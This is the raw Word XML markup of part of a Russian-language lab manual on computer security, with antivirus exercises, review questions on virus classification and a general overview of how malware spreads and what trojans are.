        </w:rPr>
        <w:t>этому не внедрится. В настоящее время программы-вакцины имеют ограниче</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное применение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5745480" cy="2423160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="Рисунок 10" descr="http://ok-t.ru/studopediaru/baza9/1239846462584.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ok-t.ru/studopediaru/baza9/1239846462584.files/image00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45480" cy="2423160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>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rPr>
        <w:t>3.1. Запустить антивирусную программу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.2. Открыть справочную систему антивирусной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.3. Ознакомиться с интерфейсом приложения (зарисовать и записать о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новные компоненты с помощью справочной системы).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4. Ознакомиться с помощью справочной системы, как можно проверить на вирусы файлы, каталоги и диски.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00F21AFE" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21AFE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.5. Отчеты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00F21AFE" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21AFE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.6. Осуществить проверку на наличие вирусов папки «Мои документы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00F21AFE" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21AFE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.7. Осуществить проверку на наличие вирусов группы файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00F21AFE" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21AFE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.8. Вывести отчет и сохранить его в текстовом файле на рабочем столе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>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pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Что такое компьютерные вирусы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Записать основные признаки проявления вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Принципы классификации вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Как разделяются вирусы по среде обитания?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. Как разделяются вирусы по способу заражения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. Как разделяются вирусы по способу проявления?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВОПРОСЫ И ЗАДАНИЯ ДЛЯ ЗАЩИТЫ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как разделяются вирусы по особенностям алгоритма?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что такое антивирусная программа?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="993" w:hanging="284"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перечислите виды антивирусных программ и их функции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="993" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Заполнить таблицу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="123" w:name="_Toc3811330"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие </w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Пути заражения ПК </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>вредоносным ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>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Компью́терный ви́рус — разновидность компьютерных программ, отл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чительной особенностью которой является способность к размножению (сам</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>репликация). В дополнение к этому вирусы могут повредить или полностью уничтожить все файлы и данные, подконтрольные пользователю, от имени к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>торого была запущена заражённая программа, а также повредить или даже ун</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чтожить операционную систему со всеми файлами в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Способы распространения вредоносного ПО</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Флеш-накопители (флешки) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В настоящее время USB-флешки заменяют дискеты и повторяют их суд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бу — большое количество вирусов распространяется через съёмные накопит</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ли, включая цифровые фотоаппараты, цифровые видеокамеры, цифровые пле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ры (MP3-плееры), сотовые телефоны. Использование этого канала ранее было преимущественно обусловлено возможностью создания на накопителе спец</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ального файла autorun.inf, в котором можно указать программу, запускаемую Проводником Windows при открытии такого накопителя. В последней версии MS Windows под торговым названием Windows 7 возможность автозапуска файлов с переносных носителей была устранена. Флешки — основной исто</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ник заражения для компьютеров, не подключённых к Интернету.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Электронная почта </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сейчас один из основных каналов распространения вирусов. Обычно в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русы в письмах электронной почты маскируются под безобидные вложения: картинки, документы, музыку, ссылки на сайты. В некоторых письмах могут содержаться действительно только ссылки, то есть в самих письмах может и не быть вредоносного кода, но если открыть такую ссылку, то можно попасть на специально созданный веб-сайт, содержащий вирусный код. Многие почтовые вирусы, попав на компьютер пользователя, затем используют адресную книгу из установленных почтовых клиентов типа Outlook для рассылки самого себя дальше.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Системы обмена мгновенными сообщениями </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Так же распространена рассылка ссылок на якобы фото, музыку либо программы, в действительности являющиеся вирусами, по ICQ и через другие программы мгновенного обмена сообщениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Веб-страницы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Возможно также заражение через страницы Интернета ввиду наличия на страницах всемирной паутины различного «активного» содержимого: скриптов, ActiveX-компонент. В этом случае используются уязвимости программного обеспечения, установленного на компьютере пользователя, либо уязвимости в ПО владельца сайта (что опаснее, так как заражению подвергаются добропор</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дочные сайты с большим потоком посетителей), а ничего не подозревающие пользователи зайдя на такой сайт рискуют заразить свой компьютер.</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Интернет и локальные сети (черви) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Черви — вид вирусов, которые проникают на компьютер-жертву без уч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стия пользователя. Черви используют так называемые «дыры» (уязвимости) в программном обеспечении операционных систем, чтобы проникнуть на комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютер. Уязвимости — это ошибки и недоработки в программном обеспечении, которые позволяют удаленно загрузить и выполнить машинный код, в резул</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тате чего вирус-червь попадает в операционную системы и, как правило, нач</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нает действия по заражению других компьютеров через локальную сеть или Интернет. Злоумышленники используют заражённые компьютеры пользоват</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лей для рассылки спама или для DDoS-атак.</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Классификация вредоносных программ</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Троя́нская программа (также — троян, троянец, троянский конь, трой) — вредоносная программа, проникающая на компьютер под видом безвредной — кодека, скринсейвера, хакерского ПО и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Троянские кони» не имеют собственного механизма распространения, и этим отличаются от вирусов, которые распространяются, прикрепляя себя к безобидному ПО или документам, и «червей», которые копируют себя по сети. Впрочем, троянская программа может нести вирусное тело — тогда запусти</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ший </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>троянца превращается в очаг «заразы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
